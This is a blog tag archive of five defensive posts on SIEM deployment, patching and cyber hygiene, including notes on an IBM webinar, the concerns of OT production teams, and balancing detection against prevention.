Tag Archives: SIEM

IBM Webinar: Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching

22 October 2016

On Tuesday, I watched the IBM webinar ‘Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching’.

On slide 3 one could read the really interesting statement ‘NSA: no zero days were used in any high profile breaches over last 24 months’.

Slide 3 - Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Slide 3 – Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Curtis Dukes, deputy national manager of security systems within the NSA, said that NSA has been involved in incident response or mitigation efforts for all ‘high profile incidents’ one has read about in the Washington Post or the New York times.

In all this incidents hacker used somewhat simple technology like spear phishing, water holing and USB-drive delivery to get onto the victim’s networks.

In the last 24 months, not one zero day has been used in these high profile intrusions.

That is a very interesting insight. Moreover, Curtis Dukes said that

The fundamental problem we faced in every one of those incidents was poor cyber hygiene.

The central idea of the webinar is to harden all systems by applying at least all existing patches to the known vulnerabilities, and in a timely manner. For most of the organizations this is a great challenge: Applying an endless stream of operating system and application patches to thousands of servers and endpoints is a never-ending nightmare. But essential to hinder an attacker, who managed to get on the network, in his lateral movement across the network.

If an attacker cannot exploit existing vulnerabilities, he is forced to install hacking tools from his C&C server. But this will increase the likelihood of detection because the attacker creates anomalies which can be detected e.g. by a current anti-malware solution or a well-tuned SIEM system.

It is important to recognize that cyber hygiene shall not be restricted to patching and password rules. Operating systems offer lots of powerful inbuilt tools, e.g. PowerShell, which can be used by an attacker to move laterally across the network. Such movements a much harder to detect, because they are very similar to standard user behavior. Pass-the-hash attacks are another example where patching is of limited value only.

It is very important to understand what threats a security solution mitigates. But it is of crucial importance to know the gaps and to have some ideas on how to deal with them effectively.

Have a good weekend.

A SIEM Security Nightmare

18 September 2016

A few weeks ago, we started a small project to attach a production site to the central SIEM system.

Operational IT (OT) groups, which run the production IT systems, are traditionally not very happy when it comes to a close collaboration with Information Technology (IT) groups which run the ‘Office’ IT systems. OT groups are always afraid of negative impacts of Office IT systems and procedures to the availability and the safety of the production facilities.

Thus we started with a minimal invasive approach. Our goal was to keep the impact of the local SIEM components on the production active directory, systems and firewalls at a minimum.

The result was remarkable: Within a few days we attached some Windows systems, switches and firewalls to the central SIEM system. No technical users were installed in the production active directory, and only 3 ports were opened on the firewall for a point to point connection from the local SIEM component to the central system. More important, no reboot of whatever system was required! The OT group was positively impressed.

Unfortunately, to keep the local SIEM software up-to-date patches must be applied 6 to 8 times a year. Patching requires always a new installation and configuration of the local SIEM components. This will keep the OT groups busy, in particular at large production sites with lots of network partitions.

To reduce this effort, a management system can be set up which automates the local installation and configuration of the SIEM software components. But for the operation of the management system, we have to open additional firewall ports for communication from outside the production network to SIEM components in all network partitions inside the production network. This renders our network security concept invalid. In the worst case, attackers can use these connections to get access to the production systems from the office network.

SIEM is starting to become a security nightmare for the OT groups. Even though it would be quite simple for the vendor of the SIEM software to turn this into a really smart and secure process:

  • Change the software patching process such that the configuration of local SIEM components is retained
  • Introduce an offline management mode, e.g. admit the application of predefined configurations

With this, the impact of the SIEM software on the production network is minimized, and the overall security level is retained. Unfortunately, vendors of security software are often not interested in the overall security level …

Have a good weekend.

A risked-based approach to SIEM rollout hardly makes sense

25 July 2015

I had a lot of discussions about SIEM rollout in the past weeks. One approach is to watch only Windows server systems that store business critical information or provide critical infrastructure services. Why should we waste time and effort on information not critical for business? That sounds convincing, in particular with a risk based approach in mind.

My approach goes far beyond this. I strongly recommend to watch all windows server system through SIEM.

The reason is quite simple: In a Windows server network lots of user accounts and technical accounts are used for administrative tasks. In general, this accounts are globally defined (in the Windows Active Directory) and member of the individual server’s administrators group. And, in general, this accounts are used for all systems, even for those storing business critical information.

If one assumes the about 10% of a company’s servers manage business critical information, hacking attempts on 90% of the servers will remain undetected. An attacker who hijacks one of the non-critical systems, and starts a DLL injection attack on the Windows Local Security Service lsass.exe to extract plain text passwords from memory, will have access to all of your systems within minutes.

But if you watch all servers through your SIEM system you will get a security incident within seconds after the hacking attempt takes place. With well-defined security incident processes in place you may be able to prevent the worst.

This reminds me of the report ‘Dissecting the Top Five Network Attack Methods: A Thief’s Perspective’ I read this week:

I love breaching a company that spends tons of money on gear but can’t get it working together. I know I leave traces, but by the time the admins connect all the dots, I’m long gone.

In the case above the admins do not even have the chance to connect all the dots because they are almost blind.

Have a good weekend!

To be successful a SIEM implementation should follow the ISO 27001 approach

20 July 2015

Last Wednesday I participated in a workshop on Production IT Security in Frankfurt. The presentations about Security Assessments, SIEM solutions, Next Generation Firewalls and Threat Intelligence were very interesting, but, as always, I got the most valuable information from the discussions with the other attendees during coffee break. It was really amazing to hear that the attendees, although they came from different companies, talked about the same mostly negative experiences in their SIEM projects.

During my ride back to Leverkusen I had time to think about this. Expectation management was a big issue in the discussions. The PowerPoints of the vendors suggest a quick and easy installation and start-up, and with some days training in Big Data methods the SIEM operator can set up dashboards which show the current security status of your company. Far from it!

The key capabilities of a SIEM solution are:

(1) Data aggregation and correlation:  Collect event data from various sources, correlate them, and integrate them with other information sources to turn the data into useful information.

(2) Compliance: Gather compliance data to support security, governance and auditing processes.

(3) Retention and Forensic analysis: Long term storage of historical event data for correlation over time and forensic analysis in the case of a security incident.

(4) Dashboard: Turn aggregated and correlated data into informational charts to aid security staff in identifying abnormal usage patterns.

(5) Alerting: Automated analysis of correlated events and production of alerts, to notify recipients of immediate issues.

The implementation of each function requires a big effort in preparation and operation. Let me show this by the means of two examples:

(4) Dashboard. In order to find abnormal usage patterns you have to define normal usage patterns first. This takes not only time. It is really hard to find relevant patterns from the ocean of events that systems create during normal operation. To ensure fast start-up it is required to cleanup your systems of e.g. event errors created by mis-configured services before you start operation.

(5) Alerting is probably the most interesting capability of a SIEM system. It allows you to act directly upon security incidents. To get the most of alerting you have to set up an incident response process, ideally depending on the classification of the information assets to prevent wasting of time and effort.

This requires that all assets are listed in an asset repository, classified and an asset owner is assigned, before your SIEM solution goes into production.

In addition it is required that your SIEM operations group is sufficiently staffed, the operators are well-trained, and enabled to take proper actions on an incident, e.g. alerting your server operators or shutting down a server to prevent larger damage.

Sounds like the preparations required for the implementation of an Information Security Management System due to ISO 27001.

With this my advice is: For a successful and quick SIEM implementation you should follow the major steps for implementation of an ISMS.

Bonne semaine!

A mere detection strategy will fail in the defense of cyber-attacks. Just like a mere prevention strategy.

10 May 2015

Article ‘Falling Off the End of the Cyber Kill Chain’, published by Anup Ghosh, Founder and CEO at Invincea, in the May edition of The Cyber Intelligencer is worth to read and comment.

For years now detection is praised from all cyber defense experts and system vendors as the spearhead in the defense of cyber-attacks. Gartner Security Analyst Neil MacDonald’s puts it succinctly in his tweet: ‘Prevent you may, Detect you must!’

Just set up a SIEM system and record any events from any server, database, firewall, application server, network, etc. With big data methods your data scientist will find every small hint to a cyber-attack from this universe of data, in the best case only some minutes after the attack happened, in the worst case some month later or never. In the meantime the cyber attackers will quietly copy your intellectual property.

A mere detection strategy in the defense of cyber-attacks is doomed to failure, just like a mere prevention strategy.

Just a short example. Let us assume that your Windows 2012 member servers are well protected, with the latest security features configured and the latest patches installed. One of your administrators becomes a victim of a phishing attack. An attacker steals the password for the administrator account of one of your member servers and signs in to the system. He debugs the LSASS process to get access to the password hashes or the plain text password or runs a DLL injection attack against the LSASS process.

Both events are recorded in the event log of the member server. Both events are hints to cyber-attacks and must be directly investigated. But it is very likely that these events are never investigated because no one checks the logs in time.

But if your SIEM system regularly collects the critical events from your member servers the attacks are detected within minutes and proper measures can be taken.

In my opinion a successful defense strategy requires a finely balanced mixture of both detection and prevention. SIEM comes into play when all other protection measures have failed. It should be neither the first nor the sole line of defense.

Take care!